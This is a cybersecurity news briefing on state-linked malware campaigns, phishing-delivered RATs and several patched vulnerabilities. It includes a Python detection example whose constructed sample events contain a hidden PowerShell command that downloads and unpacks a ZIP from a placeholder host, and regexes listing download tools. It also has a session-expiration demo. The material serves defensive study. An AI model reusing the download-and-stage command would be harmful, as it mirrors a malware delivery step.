Cyware Daily Threat Intelligence, April 16, 2025

Daily Threat Briefing • April 16, 2025
UNC5174 is keeping it quiet and clean. Since late 2024, the Chinese state-linked group has been targeting Linux environments, using domain-squatting infrastructure to deliver SNOWLIGHT malware and a new RAT. The campaign leans on stealth: WebSockets for C2, bash scripts for delivery, and zero on-disk footprint, pointing to a mix of espionage and access brokering.
It looks like a PDF tool but acts like malware. A new phishing campaign spoofs a legitimate website to deliver a stealthy SectopRAT variant. Victims are funneled through cloned interfaces and fake CAPTCHAs before unknowingly executing PowerShell commands that drop the payload.
Browser security just got a round of urgent fixes. Chrome 135 and Firefox 137 patch several critical bugs, including memory corruption issues that could lead to remote code execution. Thunderbird updates close off serious risks too.
UNC5174 drops new VShell RAT
Sysdig uncovered a new campaign by Chinese state-linked group UNC5174, active since late 2024. The group used a malicious bash script to deliver the SNOWLIGHT malware and fileless VShell RAT via domain-squatting-based infrastructure. UNC5174 targeted Linux systems, using WebSockets for stealthy C2. Their techniques, victims, and infrastructure pointed to espionage and access brokering, with operations traced back to November 2024.
APT29 campaign targets European diplomats
Check Point Research uncovered a phishing campaign by Russian APT29, targeting European diplomatic entities using fake wine-tasting event invites. The attackers impersonated a European foreign ministry and used a new loader, GRAPELOADER, to deploy a variant of their WINELOADER backdoor. GRAPELOADER handled fingerprinting, persistence, and payload delivery, while the updated WINELOADER acted as a modular backdoor. Both shared stealth techniques and obfuscation methods.
PDF-to-DOCX scam delivers malware
CloudSEK uncovered a phishing campaign where threat actors mimicked the legitimate pdfcandy[.]com site to distribute malware. Users were tricked into running a PowerShell command, triggering the download of a ZIP payload containing ArechClient2, an advanced SectopRAT variant. This info-stealer harvests sensitive data and leverages MSBuild for stealthy execution. The attack combined fake CAPTCHAs, UI cloning, and redirection chains.
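The chain above (a user pastes a PowerShell one-liner that fetches a ZIP, then MSBuild runs the payload) leaves a recognisable parent/child and command-line shape in process-creation telemetry. The following is an added detection example, not CloudSEK's tooling or anything from the campaign: it runs a handful of rules over constructed events. The event field names, file paths and the `example.invalid` domain are invented for the demo and are not indicators from the report.

```python
"""Added example: flag ClickFix-style PowerShell download one-liners and
MSBuild abuse in constructed process-creation events. Not CloudSEK's code;
field names, paths and the domain are assumptions for the demo."""
import re
from typing import Dict, List, Tuple

# Constructed events. The domain is a reserved example name, not a real IOC.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "explorer.exe", "image": "powershell.exe",            # pasted into Run dialog
     "cmdline": 'powershell -w hidden -c "iwr http://files.example.invalid/doc.zip '
                '-o $env:TEMP\\doc.zip; Expand-Archive $env:TEMP\\doc.zip $env:TEMP\\doc"'},
    {"parent": "powershell.exe", "image": "msbuild.exe",             # payload stage
     "cmdline": 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe '
                'C:\\Users\\u\\AppData\\Local\\Temp\\doc\\build.xml'},
    {"parent": "devenv.exe", "image": "msbuild.exe",                 # a developer building code
     "cmdline": 'MSBuild.exe C:\\src\\app\\app.csproj /t:Build'},
    {"parent": "services.exe", "image": "powershell.exe",            # scheduled admin script
     "cmdline": 'powershell.exe -File C:\\Scripts\\nightly-backup.ps1'},
]

# Cmdlets and .NET members commonly used to pull a second stage.
DOWNLOAD_RE = re.compile(
    r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
    r"start-bitstransfer|curl|wget)\b", re.I)
# Switches that hide the console or obscure the script body.
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b", re.I)
# MSBuild project files should not normally live in user-writable scratch space.
USER_PATH_RE = re.compile(r"\\(temp|appdata|downloads|public)\\", re.I)
# Parents that indicate a human typed or pasted the command.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}


def classify(ev: Dict[str, str]) -> List[str]:
    """Return the reasons an event matches the phishing chain; empty if benign."""
    reasons: List[str] = []
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
    if image == "powershell.exe":
        if parent in INTERACTIVE_PARENTS and DOWNLOAD_RE.search(cmd):
            reasons.append("powershell launched from user shell with download cmdlet")
        if HIDDEN_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
            reasons.append("hidden/encoded powershell that downloads content")
    elif image == "msbuild.exe":
        if parent == "powershell.exe":
            reasons.append("msbuild spawned by powershell")
        if USER_PATH_RE.search(cmd):
            reasons.append("msbuild project file in user-writable path")
    return reasons


def detect(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run classify() over every event and return (index, reasons) for hits."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]


if __name__ == "__main__":
    for idx, why in detect(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["image"], "->", "; ".join(why))
```

Each rule is deliberately narrow (parent plus command-line content, or image plus path), so a developer's MSBuild run and a scheduled PowerShell script pass through while the pasted downloader and the MSBuild stage from a temp directory are both flagged.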
Maximum severity bug in Apache Roller
Apache Roller patched a critical vulnerability (CVE-2025-24859) that allowed existing sessions to remain valid after a password change. Caused by insufficient session expiration, the flaw meant that an attacker who had already hijacked a session, including an admin session, kept that access even after the legitimate user changed the password. Version 6.1.5 addresses the issue with centralized session management that invalidates sessions on password change.
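To make the bug class concrete, here is an added illustration (not Apache Roller's code; the in-memory store, class names and demo account are assumptions) of a session layer that keeps sessions alive across a password change, next to the fix: on a successful change, every other session for that account is revoked while the session that performed the change is kept.

```python
"""Added illustration of insufficient session expiration on password change
(the bug class behind CVE-2025-24859) beside the fix. Not Apache Roller's
code; the store, class names and the 'admin' account are assumed for the demo."""
import hashlib
import hmac
import os
import secrets
from typing import Dict, Optional, Tuple


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class SessionStore:
    """Server-side registry: opaque token -> owning user."""

    def __init__(self) -> None:
        self._sessions: Dict[str, str] = {}

    def create(self, user: str) -> str:
        token = secrets.token_urlsafe(32)
        self._sessions[token] = user
        return token

    def user_for(self, token: str) -> Optional[str]:
        return self._sessions.get(token)

    def revoke_all_for(self, user: str, keep: Optional[str] = None) -> int:
        """Drop every session of `user` except `keep`; return how many were dropped."""
        doomed = [t for t, u in self._sessions.items() if u == user and t != keep]
        for token in doomed:
            del self._sessions[token]
        return len(doomed)


class UserService:
    def __init__(self, sessions: SessionStore, revoke_on_change: bool) -> None:
        self.sessions = sessions
        self.revoke_on_change = revoke_on_change  # False reproduces the flaw
        self._creds: Dict[str, Tuple[bytes, bytes]] = {}

    def register(self, user: str, password: str) -> None:
        salt = os.urandom(16)
        self._creds[user] = (salt, _hash_password(password, salt))

    def _verify(self, user: str, password: str) -> bool:
        if user not in self._creds:
            return False
        salt, digest = self._creds[user]
        return hmac.compare_digest(digest, _hash_password(password, salt))

    def login(self, user: str, password: str) -> Optional[str]:
        return self.sessions.create(user) if self._verify(user, password) else None

    def change_password(self, user: str, old: str, new: str, current_token: str) -> int:
        """Return the number of other sessions revoked (0 means they all survive)."""
        if not self._verify(user, old):
            raise PermissionError("old password does not match")
        self.register(user, new)
        if self.revoke_on_change:
            # Fix: the session performing the change stays, all others are dropped.
            return self.sessions.revoke_all_for(user, keep=current_token)
        return 0  # Vulnerable: hijacked sessions keep working


def hijacked_session_survives(revoke_on_change: bool) -> bool:
    """Attacker already holds a session for 'admin'; the victim then changes password."""
    store = SessionStore()
    svc = UserService(store, revoke_on_change)
    svc.register("admin", "old-pass")            # constructed demo account
    victim = svc.login("admin", "old-pass")
    stolen = svc.login("admin", "old-pass")      # attacker's session from leaked creds
    svc.change_password("admin", "old-pass", "new-pass", current_token=victim)
    assert store.user_for(victim) == "admin"     # legitimate user stays logged in
    assert svc.login("admin", "old-pass") is None  # old password is dead either way
    return store.user_for(stolen) == "admin"


if __name__ == "__main__":
    print("vulnerable:", hijacked_session_survives(False))  # True
    print("fixed:     ", hijacked_session_survives(True))   # False
```

The point the demo makes is that rotating the credential alone does nothing for sessions already issued; the server must hold an authoritative session registry (or a per-user session generation counter) so that a password change, an explicit logout-everywhere action, or an admin lockout can invalidate tokens the attacker already holds.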
Chrome 135 and Firefox 137 updates
Google and Mozilla released security updates for Chrome 135 and Firefox 137 to patch critical and high-severity vulnerabilities. Chrome fixes include a heap buffer overflow (CVE-2025-3619) and a use-after-free bug (CVE-2025-3620) that could enable arbitrary code execution. Firefox patched CVE-2025-3608, a race condition in HTTP handling. Thunderbird updates addressed two high-severity flaws that could expose hashed Windows credentials or directory listings. While no active exploitation has been reported, users are urged to update immediately.
Oracle patches 180 flaws
Oracle's April 2025 Critical Patch Update included 378 security patches covering roughly 180 distinct vulnerabilities (a single CVE is often patched separately in several products, so the patch count exceeds the CVE count); 255 of the patches address vulnerabilities that are remotely exploitable without authentication. Oracle Communications received the most fixes (103), followed by MySQL, Fusion Middleware, and Financial Services. Around 40 patches addressed critical-severity flaws. Additional updates were issued for Solaris and Linux, with dozens of patches for remotely exploitable bugs.